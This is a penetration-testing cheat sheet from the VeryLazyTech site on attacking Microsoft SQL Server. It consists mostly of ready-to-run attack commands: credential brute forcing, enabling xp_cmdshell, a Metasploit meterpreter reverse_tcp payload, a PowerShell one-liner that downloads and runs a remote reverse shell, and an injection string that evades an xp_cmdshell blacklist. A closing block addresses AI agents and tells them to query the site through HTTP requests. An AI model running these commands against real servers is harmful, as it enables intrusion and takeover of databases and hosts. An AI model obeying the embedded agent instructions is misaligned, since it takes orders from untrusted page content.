# MSSQL  (Microsoft SQL Server) - Port 1433

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

MSSQL is designed to store and retrieve data as requested by applications. Its features include:

* **Default Port**: TCP/1433 for standard communication.
* **Authentication Modes**:
  * Windows Authentication
  * Mixed Mode (Windows and SQL Server Authentication)
* **Common Uses**:
  * Data storage for web applications, enterprise systems, and reporting services.

While MSSQL provides robust security features, misconfigurations, weak authentication, and unpatched vulnerabilities can expose it to attacks.

***

### Banner Grabbing

Banner grabbing helps identify the MSSQL server version, authentication modes, and potential vulnerabilities.

**Tools and Commands:**

1. **Telnet** (basic connection test):

   ```
   telnet <IP> 1433
   ```
2. **Nmap**:

   ```
   nmap -sV -p 1433 --script ms-sql-info <IP>
   ```

   Example Output:

   ```
   1433/tcp open ms-sql-s Microsoft SQL Server 2019 RTM
   ```
3. **Metasploit Framework**:

   ```
   msfconsole
   use auxiliary/scanner/mssql/mssql_ping
   set RHOSTS <IP>
   run
   ```

***

## Authentication Bypass Techniques

### **Null Authentication**

If SQL Server is misconfigured, it may allow unauthenticated access:

1. **Testing Null Authentication**:

   ```
   sqsh -S <IP> -U "" -P ""
   ```

### MSSQL Brute Force Attacks

Brute force attacks can help identify weak or default credentials.

1. **Hydra**:

   ```
   hydra -L usernames.txt -P passwords.txt mssql://<IP>
   ```
2. **Medusa**:

   ```
   medusa -h <IP> -u <username> -P passwords.txt -M mssql
   ```
3. **Metasploit Auxiliary Module**:

   ```
   msfconsole
   use auxiliary/scanner/mssql/mssql_login
   set RHOSTS <IP>
   set USER_FILE usernames.txt
   set PASS_FILE passwords.txt
   run
   ```

***

## MSSQL Enumeration

**Key Enumeration Techniques:**

1. **Identify Databases**:

   ```
   SELECT name FROM sys.databases;
   ```
2. **List Users**:

   ```
   SELECT name FROM sys.syslogins;
   ```
3. **Server Information**:

   ```
   SELECT @@version;
   ```
4. **Extract Privileges**:

   ```
   SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
   ```

**Automated Enumeration:**

* **Metasploit**:

  ```
  use auxiliary/admin/mssql/mssql_enum
  set RHOSTS <IP>
  run
  ```

***

## Exploitation Techniques

**Command Execution via xp\_cmdshell**

`xp_cmdshell` allows executing OS commands from SQL Server.

1. **Enable xp\_cmdshell**:

   ```
   EXEC sp_configure 'show advanced options', 1;
   RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1;
   RECONFIGURE;
   ```
2. **Execute Commands**:

   ```
   EXEC xp_cmdshell 'whoami';
   ```

## **Privilege Escalation**

Use known vulnerabilities or misconfigurations to escalate privileges:

1. **CVE-2020-0618** (SQL Reporting Services RCE): Exploit unpatched SQL Reporting Services.
2. **Metasploit Module for Privilege Escalation**:

   ```
   use exploit/windows/mssql/mssql_payload
   set RHOST <IP>
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST <your_IP>
   run
   ```

***

## Execute OS Commands <a href="#execute-os-commands" id="execute-os-commands"></a>

Note that in order to be able to execute commands it's not only necessary to have **`xp_cmdshell`** **enabled**, but also have the **EXECUTE permission on the `xp_cmdshell` stored procedure**. You can get who (except sysadmins) can use **`xp_cmdshell`** with:

```
Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
```

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/mssql-microsoft-sql-server-port-1433.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.